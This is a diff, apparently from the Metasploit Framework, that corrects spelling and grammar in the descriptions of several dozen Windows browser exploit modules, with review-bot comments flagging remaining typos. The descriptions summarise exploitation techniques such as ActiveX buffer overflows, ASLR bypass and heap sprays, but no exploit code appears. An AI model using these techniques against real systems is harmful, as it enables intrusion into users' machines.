b/modules/exploits/windows/browser/adobe_flash_regex_value.rb index 90ebd17fac..cd33b6f860 100644 --- a/modules/exploits/windows/browser/adobe_flash_regex_value.rb +++ b/modules/exploits/windows/browser/adobe_flash_regex_value.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.5.502.149. By supplying a specially crafted swf file - with special regex value, it is possible to trigger an memory corruption, which + with special regex value, it is possible to trigger a memory corruption, which results in remote code execution under the context of the user, as exploited in the wild in February 2013. This module has been tested successfully with Adobe Flash Player 11.5 before 11.5.502.149 on Windows XP SP3 and Windows 7 SP1 before diff --git a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb index d0b5b556c3..22d9888544 100644 --- a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb +++ b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory', 'Description' => %q{ - This module exploits an unintialized memory vulnerability in Adobe Flash Player. The + This module exploits an uninitialized memory vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails to initialize allocated memory. When using a correct memory layout this vulnerability leads to a ByteArray object corruption, which can be abused to access and corrupt memory. diff --git a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb index 778e71dcdb..b388b83251 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb 
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various - Windows versions due a the hardcoded syscall number. + Windows versions due a hardcoded syscall number. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/browser/aim_goaway.rb b/modules/exploits/windows/browser/aim_goaway.rb index b0640ec8ae..964f71b6e0 100644 --- a/modules/exploits/windows/browser/aim_goaway.rb +++ b/modules/exploits/windows/browser/aim_goaway.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a flaw in the handling of AOL Instant Messenger's 'goaway' URI handler. An attacker can execute - arbitrary code by supplying a overly sized buffer as the + arbitrary code by supplying an overly sized buffer as the 'message' parameter. This issue is known to affect AOL Instant Messenger 5.5. }, diff --git a/modules/exploits/windows/browser/ask_shortformat.rb b/modules/exploits/windows/browser/ask_shortformat.rb index caca2a5cfa..0e4713a70a 100644 --- a/modules/exploits/windows/browser/ask_shortformat.rb +++ b/modules/exploits/windows/browser/ask_shortformat.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Ask.com Toolbar 4.0.2.53. - An attacker may be able to excute arbitrary code by sending an overly + An attacker may be able to execute arbitrary code by sending an overly long string to the "ShortFormat()" method in askbar.dll. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb index a801941580..b8ad0c2019 100644 
--- a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb +++ b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in BaoFeng's Storm media Player ActiveX - control. Verions of mps.dll including 3.9.4.27 and lower are affected. When passing + control. Versions of mps.dll including 3.9.4.27 and lower are affected. When passing an overly long string to the method "OnBeforeVideoDownload" an attacker can execute arbitrary code. }, diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb index b880fb0dae..f0d07ab35c 100644 --- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb +++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb @@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module allows remote attackers to place arbitrary files on a users file system by abusing the "DownloadImageFileURL" method in the Black Ice BIImgFrm.ocx ActiveX - Control (BIImgFrm.ocx 12.0.0.0). Code exeuction can be acheived by first uploading the + Control (BIImgFrm.ocx 12.0.0.0). Code execution can be achieved by first uploading the payload to the remote machine, and then upload another mof file, which enables Windows Management Instrumentation service to execute the binary. Please note that this module currently only works for Windows before Vista. Also, a similar issue is reported in diff --git a/modules/exploits/windows/browser/communicrypt_mail_activex.rb b/modules/exploits/windows/browser/communicrypt_mail_activex.rb index 72f477a291..286239a870 100644 --- a/modules/exploits/windows/browser/communicrypt_mail_activex.rb 
+++ b/modules/exploits/windows/browser/communicrypt_mail_activex.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the ANSMTP.dll/AOSMTP.dll - ActiveX Control provided by CommuniCrypt Mail 1.16. By sending a overly + ActiveX Control provided by CommuniCrypt Mail 1.16. By sending an overly long string to the "AddAttachments()" method, an attacker may be able to execute arbitrary code. }, diff --git a/modules/exploits/windows/browser/ea_checkrequirements.rb b/modules/exploits/windows/browser/ea_checkrequirements.rb index 0c07c37584..f893fba392 100644 --- a/modules/exploits/windows/browser/ea_checkrequirements.rb +++ b/modules/exploits/windows/browser/ea_checkrequirements.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl - ActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long + ActiveX Control (NPSnpy.dll 1.1.0.36. When sending an overly long string to the CheckRequirements() method, an attacker may be able to execute arbitrary code. }, diff --git a/modules/exploits/windows/browser/honeywell_tema_exec.rb b/modules/exploits/windows/browser/honeywell_tema_exec.rb index a86cad5fea..ef769faeea 100644 --- a/modules/exploits/windows/browser/honeywell_tema_exec.rb +++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb 
@@ -13,11 +13,11 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "Honeywell Tema Remote Installer ActiveX Remote Code Execution", 'Description' => %q{ - This modules exploits a vulnerability found in the Honewell Tema ActiveX Remote + This module exploits a vulnerability found in the Honeywell Tema ActiveX Remote Installer. This ActiveX control can be abused by using the DownloadFromURL() function to install an arbitrary MSI from a remote location without checking source authenticity or user notification. This module has been tested successfully with - the Remote Installer ActiveX installed with HoneyWell EBI R410.1 - TEMA 5.3.0 and + the Remote Installer ActiveX installed with Honeywell EBI R410.1 - TEMA 5.3.0 and Internet Explorer 6, 7 and 8 on Windows XP SP3. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb index 6b222dd7b9..3e8f5f55b1 100644 --- a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb +++ b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb @@ -30,8 +30,8 @@ class MetasploitModule < Msf::Exploit::Remote The vulnerability is found in the "RunAndUploadFile" method where the "OtherFields" parameter with user controlled data - is used to build a "Content-Dispoition" header and attach - contents in a insecure way which allows to overflow a buffer + is used to build a "Content-Disposition" header and attach + contents in an insecure way which allows to overflow a buffer in the stack. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb index b6de91e82f..1b34a8d3c6 100644 --- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb +++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb 
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control', 'Description' => %q{ This module exploits a stack based buffer overflow in the Active control file - ImageViewer2.OCX by passing a overly long argument to an insecure TifMergeMultiFiles() + ImageViewer2.OCX by passing an overly long argument to an insecure TifMergeMultiFiles() method. Exploitation results in code execution with the privileges of the user who browsed to the exploit page. diff --git a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb index 9cfc644c40..dfa0e379c3 100644 --- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb +++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb @@ -27,9 +27,9 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => "InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow", 'Description' => %q{ This module exploits a heap overflow found in InduSoft Web Studio <= 61.6.00.00 - SP6. The overflow exists in the ISSymbol.ocx, and can be triggered with a long + SP6. The overflow exists in the ISSymbol.ocx, and can be triggered with a long string argument for the InternationalSeparator() method of the ISSymbol control. - This modules uses the msvcr71.dll form the Java JRE6 to bypass ASLR. + This module uses the msvcr71.dll form the Java JRE6 to bypass ASLR. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/browser/intrust_annotatex_add.rb b/modules/exploits/windows/browser/intrust_annotatex_add.rb index e4c7178b9f..81f047a3b8 100644 --- a/modules/exploits/windows/browser/intrust_annotatex_add.rb +++ b/modules/exploits/windows/browser/intrust_annotatex_add.rb 
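Review bot: The rewritten line in indusoft_issymbol_internationalseparator.rb fixes "modules" but leaves a second typo on the same line: `This module uses the msvcr71.dll form the Java JRE6 to bypass ASLR.` should read `from the Java JRE6`. The version string two lines above, `InduSoft Web Studio <= 61.6.00.00`, also looks like a mis-typed version (the product is versioned 6.1.x); that is an inference from the product naming and worth confirming against the referenced advisory before changing.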
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Quest InTrust Annotation Objects Uninitialized Pointer', 'Description' => %q{ This module exploits an uninitialized variable vulnerability in the - Annotation Objects ActiveX component. The activeX component loads into memory without + Annotation Objects ActiveX component. The ActiveX component loads into memory without opting into ALSR so this module exploits the vulnerability against windows Vista and Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX points to part of the ROP chain in a heap chunk and the calculated call will hit the diff --git a/modules/exploits/windows/browser/java_ws_double_quote.rb b/modules/exploits/windows/browser/java_ws_double_quote.rb index fb73f00025..2659225f19 100644 --- a/modules/exploits/windows/browser/java_ws_double_quote.rb +++ b/modules/exploits/windows/browser/java_ws_double_quote.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Sun Java Web Start Double Quote Injection', 'Description' => %q{ This module exploits a flaw in the Web Start component of the Sun Java - Runtime Environment. Parameters intial-heap-size and max-heap-size in a JNLP + Runtime Environment. Parameters initial-heap-size and max-heap-size in a JNLP file can contain a double quote which is not properly sanitized when creating the command line for javaw.exe. This allows the injection of the -XXaltjvm option to load a jvm.dll from a remote UNC path into the java process. Thus diff --git a/modules/exploits/windows/browser/java_ws_vmargs.rb b/modules/exploits/windows/browser/java_ws_vmargs.rb index 107a74cc2c..3e34b80dea 100644 --- a/modules/exploits/windows/browser/java_ws_vmargs.rb +++ b/modules/exploits/windows/browser/java_ws_vmargs.rb 
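Review bot: The line directly after the corrected `ActiveX` line in intrust_annotatex_add.rb still misspells the mitigation it describes: `opting into ALSR so this module exploits the vulnerability against windows Vista` should be `opting into ASLR` and `Windows Vista`. The acronym typo matters more than the usual spelling fix because "ASLR" is a term readers and search tools key on when assessing what the module bypasses. The enclosing description continues past the end of the hunk.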
@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. - In order for this module to work, it must be ran as root on a server that + In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled. }, diff --git a/modules/exploits/windows/browser/kazaa_altnet_heap.rb b/modules/exploits/windows/browser/kazaa_altnet_heap.rb index b3fb7ebcb9..afaa0ed651 100644 --- a/modules/exploits/windows/browser/kazaa_altnet_heap.rb +++ b/modules/exploits/windows/browser/kazaa_altnet_heap.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in the Altnet Download Manager ActiveX Control (amd4.dll) bundled with Kazaa Media Desktop 3.2.7. - By sending a overly long string to the "Install()" method, an attacker may be + By sending an overly long string to the "Install()" method, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/logitechvideocall_start.rb b/modules/exploits/windows/browser/logitechvideocall_start.rb index de6766f7fb..6f7c9cd172 100644 --- a/modules/exploits/windows/browser/logitechvideocall_start.rb +++ b/modules/exploits/windows/browser/logitechvideocall_start.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Logitech VideoCall ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the Logitech VideoCall ActiveX - Control (wcamxmp.dll 2.0.3470.448). By sending a overly long string to the + Control (wcamxmp.dll 2.0.3470.448). By sending an overly long string to the "Start()" method, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 
diff --git a/modules/exploits/windows/browser/macrovision_unsafe.rb b/modules/exploits/windows/browser/macrovision_unsafe.rb index 12895f2825..757f4e051e 100644 --- a/modules/exploits/windows/browser/macrovision_unsafe.rb +++ b/modules/exploits/windows/browser/macrovision_unsafe.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Macrovision InstallShield Update Service ActiveX Unsafe Method', 'Description' => %q{ - This module allows attackers to execute code via an unsafe methods in Macrovision InstallShield 2008. + This module allows attackers to execute code via an unsafe method in Macrovision InstallShield 2008. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], diff --git a/modules/exploits/windows/browser/mcafee_mvt_exec.rb b/modules/exploits/windows/browser/mcafee_mvt_exec.rb index 131ff4515d..f93e14b3c3 100644 --- a/modules/exploits/windows/browser/mcafee_mvt_exec.rb +++ b/modules/exploits/windows/browser/mcafee_mvt_exec.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability", 'Description' => %q{ - This modules exploits a vulnerability found in McAfee Virtual Technician's + This module exploits a vulnerability found in McAfee Virtual Technician's MVTControl. This ActiveX control can be abused by using the GetObject() function to load additional unsafe classes such as WScript.Shell, therefore allowing remote code execution under the context of the user. diff --git a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb index a639480a73..e82f0e6d6a 100644 --- a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb +++ b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb 
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'McAfee Visual Trace ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX - Control (NeoTraceExplorer.dll 1.0.0.1). By sending a overly long string to the + Control (NeoTraceExplorer.dll 1.0.0.1). By sending an overly long string to the "TraceTarget()" method, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb index 2708fc7b9b..d20f53b0db 100644 --- a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb +++ b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb @@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Firefox onreadystatechange Event DocumentViewerImpl Use After Free', 'Description' => %q{ - This module exploits a vulnerability found on Firefox 17.0.6, specifically an use - after free of a DocumentViewerImpl object, triggered via an specially crafted web + This module exploits a vulnerability found on Firefox 17.0.6, specifically a use + after free of a DocumentViewerImpl object, triggered via a specially crafted web page using onreadystatechange events and the window.stop() API, as exploited in the wild on 2013 August to target Tor Browser users. }, diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb index ec1a36d4ca..8bc99387b1 100644 --- a/modules/exploits/windows/browser/mozilla_mchannel.rb +++ b/modules/exploits/windows/browser/mozilla_mchannel.rb 
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability', 'Description' => %q{ - This module exploits an use after free vulnerability in Mozilla + This module exploits a use after free vulnerability in Mozilla Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs diff --git a/modules/exploits/windows/browser/mozilla_reduceright.rb b/modules/exploits/windows/browser/mozilla_reduceright.rb index b188ee7c30..f92acefe8c 100644 --- a/modules/exploits/windows/browser/mozilla_reduceright.rb +++ b/modules/exploits/windows/browser/mozilla_reduceright.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability found in Mozilla Firefox 3.6. When an array object is configured with a large length value, the reduceRight() method - may cause an invalid index being used, allowing abitrary remote code execution. + may cause an invalid index being used, allowing arbitrary remote code execution. Please note that the exploit requires a longer amount of time (compare to a typical browser exploit) in order to gain control of the machine. }, diff --git a/modules/exploits/windows/browser/ms06_013_createtextrange.rb b/modules/exploits/windows/browser/ms06_013_createtextrange.rb index 25823ada7f..98d1d0c40f 100644 --- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb +++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb 
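Review bot: The context line following the fixed `arbitrary` in mozilla_reduceright.rb has a remaining grammar slip: `(compare to a typical browser exploit)` should be `(compared to a typical browser exploit)`. Since this sweep is correcting the description text anyway, it would be worth including in the same change.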
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'MS06-013 Microsoft Internet Explorer createTextRange() Code Execution', 'Description' => %q{ This module exploits a code execution vulnerability in Microsoft Internet Explorer. - Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under + Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point to a very remote, non-existent memory location. This module is the result of merging three different exploit submissions and has only been reliably tested against Windows XP SP2. diff --git a/modules/exploits/windows/browser/ms06_071_xml_core.rb b/modules/exploits/windows/browser/ms06_071_xml_core.rb index c969b4089c..a4dc6b147a 100644 --- a/modules/exploits/windows/browser/ms06_071_xml_core.rb +++ b/modules/exploits/windows/browser/ms06_071_xml_core.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'MS06-071 Microsoft Internet Explorer XML Core Services HTTP Request Handling', 'Description' => %q{ This module exploits a code execution vulnerability in Microsoft XML Core Services which - exists in the XMLHTTP ActiveX control. This module is the modifed version of + exists in the XMLHTTP ActiveX control. This module is the modified version of http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6 + Microsoft XML Core Services 4.0 SP2. diff --git a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb index 9b09042ab7..6a1c791976 100644 --- a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb +++ b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb 
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a code execution vulnerability that occurs when a user presses F1 on MessageBox originated from VBscript within a web page. When the - user hits F1, the MessageBox help functionaility will attempt to load and use + user hits F1, the MessageBox help functionality will attempt to load and use a HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server. This particular version of the exploit implements a WebDAV server that will diff --git a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb index 7d447ee93a..3ec12c8e73 100644 --- a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb +++ b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow', 'Description' => %q{ - This module exploits a buffer overlow in l3codecx.ax while processing a + This module exploits a buffer overflow in l3codecx.ax while processing a AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite with 0's so the three least significant bytes of EIP saved on stack are overwritten and shellcode is mapped using the .NET DLL memory technique pioneered diff --git a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb index a96c5f910a..6551fe2303 100644 --- a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb +++ b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb 
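Review bot: In ms10_026_avi_nsamplespersec.rb the corrected `overflow` line runs into a context line that still reads `AVI files with MPEG Layer-3 audio contents` after `a`, i.e. `while processing a AVI files`; the article should go, giving `while processing AVI files with MPEG Layer-3 audio contents`. The following sentence, `The overflow only allows to overwrite with 0's`, would also read better as `The overflow only allows overwriting with 0's`. The description block continues beyond the hunk.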
@@ -22,12 +22,12 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption', 'Description' => %q{ - Thie module exploits a memory corruption vulnerability within Microsoft's + This module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a specially crafted CSS tag, memory corruption occurs that can lead arbitrary code execution. - It seems like Microsoft code inadvertantly increments a vtable pointer to + It seems like Microsoft code inadvertently increments a vtable pointer to point to an unaligned address within the vtable's function pointers. This leads to the program counter being set to the address determined by the address "[vtable+0x30+1]". The particular address depends on the exact diff --git a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb index 45d354cd13..58eadf8626 100644 --- a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb +++ b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb @@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote handler we want to abuse - the "onpropertychange" event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in "onselect", this will trigger "onpropertychange". During "onpropertychange" event handling, a free of the CDisplayPointer - object can be forced by using an "Unslect" (other approaches also apply), but a reference + object can be forced by using an "Unselect" (other approaches also apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because it is still trying to use that to update CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash 
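Review bot: In ms10_090_ie_css_clip.rb the context line between the two corrected lines is missing a preposition: `memory corruption occurs that can lead arbitrary code execution` should be `can lead to arbitrary code execution`. It sits inside the same hunk as the `This`/`inadvertently` fixes, so it can be folded into this change without touching another file.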
diff --git a/modules/exploits/windows/browser/nis2004_get.rb b/modules/exploits/windows/browser/nis2004_get.rb index 5437ecd04b..87c8d9aa20 100644 --- a/modules/exploits/windows/browser/nis2004_get.rb +++ b/modules/exploits/windows/browser/nis2004_get.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in the ISAlertDataCOM ActiveX Control (ISLAert.dll) provided by Symantec Norton Internet Security 2004. - By sending a overly long string to the "Get()" method, an attacker may be + By sending an overly long string to the "Get()" method, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/notes_handler_cmdinject.rb b/modules/exploits/windows/browser/notes_handler_cmdinject.rb index 389505434c..804fabe0b5 100644 --- a/modules/exploits/windows/browser/notes_handler_cmdinject.rb +++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb @@ -14,9 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "IBM Lotus Notes Client URL Handler Command Injection", 'Description' => %q{ - This modules exploits a command injection vulnerability in the URL handler for + This module exploits a command injection vulnerability in the URL handler for for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with - an specially crafted notes:// URL to execute arbitrary commands with also arbitrary + a specially crafted notes:// URL to execute arbitrary commands with also arbitrary arguments. This module has been tested successfully on Windows XP SP3 with IE8, Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2. }, diff --git a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb index d7a91b525c..2adb7c4dab 100644 --- a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb 
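Review bot: The corrected line in notes_handler_cmdinject.rb ends with `URL handler for` and the next context line begins with `for the IBM Lotus Notes Client`, so the description still reads "for for"; dropping the trailing `for` from the rewritten line fixes it. Two lines later, `to execute arbitrary commands with also arbitrary arguments` would be clearer as `to execute arbitrary commands with arbitrary arguments`.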
+++ b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0). Oracle Document Capture 10g comes bundled with a third party ActiveX control - emsmtp.dll (6.0.1.0). When passing a overly long string to the method "SubmitToExpress" + emsmtp.dll (6.0.1.0). When passing an overly long string to the method "SubmitToExpress" an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb index 19a2661d0a..4387bd2a45 100644 --- a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb +++ b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution", 'Description' => %q{ - This modules exploits a vulnerability found in the Oracle WebCenter Content + This module exploits a vulnerability found in the Oracle WebCenter Content CheckOutAndOpenControl ActiveX. This vulnerability exists in openWebdav(), where user controlled input is used to call ShellExecuteExW(). This module abuses the control to execute an arbitrary HTA from a remote location. This module has been diff --git a/modules/exploits/windows/browser/orbit_connecting.rb b/modules/exploits/windows/browser/orbit_connecting.rb index fc899f2e19..fb28a1c92e 100644 --- a/modules/exploits/windows/browser/orbit_connecting.rb +++ b/modules/exploits/windows/browser/orbit_connecting.rb 
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Orbit Downloader Connecting Log Creation Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Orbit Downloader 2.8.4. When an - attacker serves up a malicious web site, abritrary code may be executed. + attacker serves up a malicious web site, arbitrary code may be executed. The PAYLOAD windows/shell_bind_tcp works best. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/real_arcade_installerdlg.rb b/modules/exploits/windows/browser/real_arcade_installerdlg.rb index 2032f3d6d2..f60e1ed4f9 100644 --- a/modules/exploits/windows/browser/real_arcade_installerdlg.rb +++ b/modules/exploits/windows/browser/real_arcade_installerdlg.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution', 'Description' => %q{ - This module exploits a vulnerability in Real Networks Acrade Game's ActiveX control. The "exec" + This module exploits a vulnerability in Real Networks Arcade Game's ActiveX control. The "exec" function found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to run arbitrary commands on the victim machine. }, diff --git a/modules/exploits/windows/browser/realplayer_cdda_uri.rb b/modules/exploits/windows/browser/realplayer_cdda_uri.rb index 668b8d9873..45aa9c8c94 100644 --- a/modules/exploits/windows/browser/realplayer_cdda_uri.rb +++ b/modules/exploits/windows/browser/realplayer_cdda_uri.rb 
